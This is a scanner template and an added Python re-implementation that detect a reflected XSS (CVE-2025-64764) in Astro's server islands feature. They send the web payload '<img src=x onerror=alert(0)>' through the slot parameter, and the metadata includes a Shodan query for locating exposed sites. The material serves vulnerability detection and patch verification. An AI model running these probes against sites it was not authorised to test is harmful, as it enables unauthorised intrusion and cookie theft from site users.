Vulnerability description
Astro versions before 5.15.8 contain a reflected XSS caused by improper handling of the server islands feature: attacker-controlled input sent to a server island endpoint is rendered into the response without escaping, letting remote attackers execute scripts in victims' browsers. Exploitation requires that the target application actually use server islands (the fix shipped in 5.15.8).
id: CVE-2025-64764

info:
  name: Astro - Reflected XSS via server islands feature
  author: DhiyaneshDk,zhero___
  severity: high
  description: |
    Astro versions before 5.15.8 contain a reflected XSS caused by improper handling of the server islands feature, letting remote attackers execute scripts in victims' browsers. Exploitation requires that the application use server islands.
  impact: |
    Remote attackers can execute scripts in users' browsers, potentially leading to session hijacking or data theft.
  remediation: |
    Update to version 5.15.8 or later.
  reference:
    - https://zhero-web-sec.github.io/research-and-things/unlocking-reflected-xss-in-the-astro-framework
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"_server-islands"
  tags: cve,cve2025,astro,xss

variables:
  rand: "{{to_lower(rand_text_alpha(5))}}"

http:
  # Step 1: fetch the front page and confirm it references a server island.
  # The component name in the placeholder URL is extracted for the probe.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: regex
        part: body
        regex:
          - '/_server-islands/[^?]+\?e='
        internal: true

    extractors:
      - type: regex
        name: value
        part: body
        internal: true
        group: 1
        regex:
          - '/_server-islands/([^?]+)\?e='

  # Step 2: request the island directly with a slot (s=) containing an HTML
  # payload; a vulnerable version echoes the tag back verbatim.
  - raw:
      - |
        GET /_server-islands/{{value}}?e=file&p=&s={"{{rand}}":"<img+src=x+onerror=alert(0)>"} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "<img src=x onerror=alert(0)>")'
        condition: and
# digest: 4b0a00483046022100849f47e26d3acb8d85525d633ff1113f0a51fce03e36e110238b443e25fe787f022100b416c231013203600d9774eaad0ebaff614dc4a7ab9648e4a8b8aaaa625b827d:922c64590222798bb761d5b6d8e72950
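The template above only reports a hit when the payload comes back byte-for-byte, so it cannot tell a patched site (payload reflected but HTML-escaped) from one where the slot was simply not rendered. The following is an added example, not part of the Nuclei template or of the Astro project: it re-implements the same two-step check in Python and classifies the response as vulnerable, escaped, or absent. The URL layout (`/_server-islands/<name>?e=...&p=...&s=...`) and the probe payload are taken from the template; the function names, the injected `fetch` callable and the sample HTML responses are my own constructions so the logic runs offline.

```python
"""Offline re-implementation of the two-step server-island XSS check.

Added example; not the template's or Astro's own code. The request shape
(e=file&p=&s=<slot JSON>) mirrors the template. The fetch callable and the
sample responses below are constructed for illustration.
"""
import json
import re
from html import escape
from urllib.parse import quote

# Same pattern the template uses to discover server-island component names
# in the rendered page (the placeholder URL Astro emits for a deferred island).
ISLAND_RE = re.compile(r'/_server-islands/([^?"\']+)\?e=')


def extract_island_names(page_html: str) -> list:
    """Return the distinct component names referenced by server-island URLs."""
    seen, names = set(), []
    for name in ISLAND_RE.findall(page_html):
        if name not in seen:
            seen.add(name)
            names.append(name)
    return names


def build_probe_path(name: str, slot_key: str, payload: str) -> str:
    """Build the probe path: the slot JSON travels in the `s` query parameter,
    which the island renders into its HTML (the injection point)."""
    slots = json.dumps({slot_key: payload}, separators=(",", ":"))
    return f"/_server-islands/{name}?e=file&p=&s={quote(slots, safe='')}"


def classify_reflection(status: int, body: str, payload: str) -> str:
    """Classify one island response.

    'vulnerable' - payload reflected verbatim, the tag survives (pre-5.15.8)
    'escaped'    - payload reflected but HTML-escaped (safe)
    'absent'     - payload not reflected, or a non-200 response
    """
    if status != 200:
        return "absent"
    if payload in body:
        return "vulnerable"
    if escape(payload, quote=True) in body or escape(payload, quote=False) in body:
        return "escaped"
    return "absent"


def check_site(fetch, slot_key: str = "probe",
               payload: str = "<img src=x onerror=alert(0)>") -> dict:
    """Run the full check. `fetch(path) -> (status, body)` is injected so the
    same logic works against a real HTTP client or the fakes below."""
    status, index = fetch("/")
    results = {}
    if status != 200:
        return results
    for name in extract_island_names(index):
        s, body = fetch(build_probe_path(name, slot_key, payload))
        results[name] = classify_reflection(s, body, payload)
    return results


# Constructed sample responses (not captured from a real site): an index page
# referencing one island, plus a vulnerable and a fixed island response.
PAYLOAD = "<img src=x onerror=alert(0)>"
SAMPLE_INDEX = ('<html><body><script>'
                'fetch("/_server-islands/Avatar?e=default&p=abc&s=%7B%7D")'
                '</script></body></html>')
VULNERABLE_ISLAND = f'<div class="avatar">{PAYLOAD}</div>'
FIXED_ISLAND = f'<div class="avatar">{escape(PAYLOAD, quote=True)}</div>'


def fake_fetch_vulnerable(path: str):
    if path == "/":
        return 200, SAMPLE_INDEX
    if path.startswith("/_server-islands/Avatar?"):
        return 200, VULNERABLE_ISLAND
    return 404, ""


def fake_fetch_fixed(path: str):
    if path == "/":
        return 200, SAMPLE_INDEX
    if path.startswith("/_server-islands/Avatar?"):
        return 200, FIXED_ISLAND
    return 404, ""


if __name__ == "__main__":
    print(check_site(fake_fetch_vulnerable))  # {'Avatar': 'vulnerable'}
    print(check_site(fake_fetch_fixed))       # {'Avatar': 'escaped'}
```

To run it against a live host, pass a `fetch` that performs the GET (for example with `urllib.request`) and returns `(status, body)`; the `escaped` outcome is the one you expect to see after upgrading to 5.15.8, and `absent` usually means the chosen island does not render that slot rather than that the site is safe.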